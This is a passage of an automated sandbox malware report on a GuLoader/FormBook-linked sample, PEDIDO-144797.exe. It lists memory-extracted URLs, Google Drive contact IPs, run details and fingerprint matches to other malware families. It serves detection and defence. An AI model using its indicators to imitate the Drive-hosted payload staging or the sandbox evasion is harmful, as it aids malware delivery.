        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pn0%VirustotalBrowse
        https://api.msn.com:443/v1/news/Feed/Windows?0%VirustotalBrowse
        https://www.msn.com/en-us/feed0%VirustotalBrowse
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI-dark0%VirustotalBrowse
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-dark0%VirustotalBrowse
        https://www.msn.com/en-us/money/markets?id=a3oxnm1%VirustotalBrowse
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.png0%VirustotalBrowse
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In0%VirustotalBrowse
        https://excel.office.com0%VirustotalBrowse
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%VirustotalBrowse
        https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiq1%VirustotalBrowse
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
        https://www.google.com0%VirustotalBrowse
        https://aka.ms/odirm0%VirustotalBrowse
        https://drive.google.com/0%VirustotalBrowse
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi30%VirustotalBrowse
        https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew0%VirustotalBrowse
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        		142.251.40.206
        		truefalseunknown
        drive.usercontent.google.com
        		142.250.80.97
        		truefalseunknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000005.00000002.94452035443.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565423827.000000000D2BF000.00000004.00000001.00020000.00000000.sdmpfalseunknown
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pnexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowIexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
        https://www.msn.com/en-us/news/politics/chris-christie-former-trump-debate-coach-offers-key-pieces-oexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
          		unknown
          https://www.msn.com/en-us/sports/nfl/49ers-win-over-jets-ends-with-final-score-that-s-never-been-seeexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
            		unknown
            https://www.msn.com/en-us/news/us/james-earl-jones-s-talents-went-far-far-beyond-his-magnificent-voiexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
              		unknown
              https://www.msn.com/en-us/money/retirement/a-youtuber-asked-a-group-of-americans-aged-70-to-80-what-explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                		unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvWexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://www.msn.com/en-us/money/markets?id=a3oxnmexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000002.94452035443.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565423827.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://www.msn.com/en-us/feedexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://www.msn.com/en-us/play/games/drift-bossexplorer.exe, 00000005.00000000.91561655678.000000000972E000.00000004.00000001.00020000.00000000.sdmpfalse
                  		unknown
                  https://www.msn.com/en-us/autos/other/24-used-sports-cars-that-are-notoriously-reliable-yet-crazy-chexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                    		unknown
                    http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      		unknown
                      https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-farmers-the-best-way-to-cook-zucchini-they-explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI-darkexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-darkexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.pngexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://excel.office.comexplorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDPEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000626000.00000020.00000001.01000000.00000007.sdmpfalseunknown
                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_Inexplorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiqexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        http://schemas.microexplorer.exe, 00000005.00000000.91563709105.000000000A9E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91558832216.00000000032F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.94448609733.0000000009DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                          		unknown
                          http://www.gopher.ftp://ftp.PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                            		unknown
                            https://powerpoint.office.comEMexplorer.exe, 00000005.00000002.94446111895.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009864000.00000004.00000001.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.msn.com/en-us/weather/hourlyforecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown
                                https://www.msn.com/en-us/news/crime/dick-van-dyke-forever-young/ar-AA1lDpRDexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://aka.ms/odirmexplorer.exe, 00000005.00000002.94446111895.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.92004096261.00000000098DB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://www.google.comPEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdPEDIDO-144797.exe, 00000002.00000001.89609492793.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalseunknown
                                  https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://drive.google.com/PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002412000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=a7af015c-55f5-465b-b0e4-6fefexplorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://outlook.com~0explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalseunknown
                                      https://www.msn.com/en-us/news/us/trump-repeats-false-claims-that-children-are-undergoing-transgendeexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://apis.google.comPEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://ocsp.quovadisoffshore.com0PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-texplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.svexplorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.msn.com/en-us/money/markets?id=a33k6hexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W36_Mostexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-darkexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://api.msn.com/sports/blended?market=en-us&satoriid=02bde011-1e9explorer.exe, 00000005.00000002.94446111895.0000000009700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwmexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://www.msn.com/en-us/weather/forecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xhcmEiLexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5mexplorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://www.msn.com/en-us/money/markets?id=a6qja2explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://www.msn.com/en-us/tv/news/the-bold-the-beautiful-young-and-the-restless-more-get-premiere-daexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svgexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.msn.com/en-us/news/politics/jd-vance-spreads-outrageous-lie-about-haitian-immigrants/ar-explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://word.office.comF0explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://www.msn.com/en-us/money/personalfinance/18-everyday-household-items-that-are-surprisingly-vaexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://drive.usercontent.google.com/PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svgexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://nsis.sf.net/NSIS_ErrorErrorPEDIDO-144797.exefalse
                                                                                  		unknown
                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-darkexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://www.glamour.com/story/shag-haircut-photos-productsexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://www.msn.com/en-us/news/politics/6-things-to-watch-for-when-kamala-harris-debates-donald-trumexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://www.msn.com/en-us/entertainment/news/james-earl-jones-dies-at-93-all-about-his-son-flynn/ar-explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://www.msn.com/en-us/news/crime/tyreek-hill-s-traffic-stop-shows-interactions-with-police-can-bexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://www.msn.com/en-us/lifestyle/beauty/40-shag-haircuts-to-inspire-your-next-salon-visit/ss-AA1pexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://www.msn.com/en-us/health/medical/2-egg-brands-have-been-recalled-due-to-a-serious-salmonellaexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.msn.com/en-us/play/games/cut-explorer.exe, 00000005.00000000.91561655678.000000000972E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/WeatherInsight/Wexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdPEDIDO-144797.exe, 00000002.00000001.89609492793.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://www.instyle.com/hair/shag-haircut-face-shapeexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://www.quovadis.bm0PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://cdn.query.fexplorer.exe, 00000005.00000002.94446111895.0000000009700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://api.msn.com/explorer.exe, 00000005.00000000.91561655678.00000000097EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.00000000097EF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=DC09251A71C5472DA2BDFD73DC109609&timeOut=5000&ocexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disapexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.msn.com/en-us/news/world/gaza-authorities-say-deadly-blasts-hit-humanitarian-zone/ar-AA1explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      142.251.40.206
                                                                                                                      		drive.google.comUnited States
                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                      142.250.80.97
                                                                                                                      		drive.usercontent.google.comUnited States
                                                                                                                      		15169GOOGLEUSfalse

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1525501
                                                                                                                      Start date and time:2024-10-04 10:48:02 +02:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 17m 51s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                      Run name:Suspected Instruction Hammering
                                                                                                                      Number of analysed new started processes analysed:4
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:2
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:PEDIDO-144797.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.evad.winEXE@5/8@2/2
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 91%
                                                                                                                      • Number of executed functions: 74
                                                                                                                      • Number of non-executed functions: 272
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      04:51:59API Interceptor11242843x Sleep call for process: SecEdit.exe modified
                                                                                                                      04:57:50API Interceptor19x Sleep call for process: explorer.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      No context

                                                                                                                      Domains

                                                                                                                      No context

                                                                                                                      ASNs

                                                                                                                      No context

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      37f463bf4616ecd445d4a1937da06e19-pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 142.250.80.97
                                                                                                                      • 142.251.40.206
                                                                                                                      TERMENII CONTRACTULUI (ACORD NOU#U0102 COMAND#U0102)-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 142.250.80.97
                                                                                                                      • 142.251.40.206
                                                                                                                      Cotizaci#U00f3n#12643283.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 142.250.80.97
                                                                                                                      • 142.251.40.206
                                                                                                                      BnxBRWQWhy.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                      • 142.250.80.97
                                                                                                                      • 142.251.40.206
                                                                                                                      file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                      • 142.250.80.97
                                                                                                                      • 142.251.40.206
                                                                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                      • 142.250.80.97
                                                                                                                      • 142.251.40.206
                                                                                                                      NJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                      • 142.250.80.97
                                                                                                                      • 142.251.40.206
                                                                                                                      rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 142.250.80.97
                                                                                                                      • 142.251.40.206
                                                                                                                      app__v7.5.3_.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 142.250.80.97
                                                                                                                      • 142.251.40.206
                                                                                                                      WarzoneCheat.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                      • 142.250.80.97
                                                                                                                      • 142.251.40.206

                                                                                                                      Dropped Files

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dllrpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                        rpedido-002297.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          FACTURA-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            FACTURA-002297.exeGet hashmaliciousGuLoaderBrowse
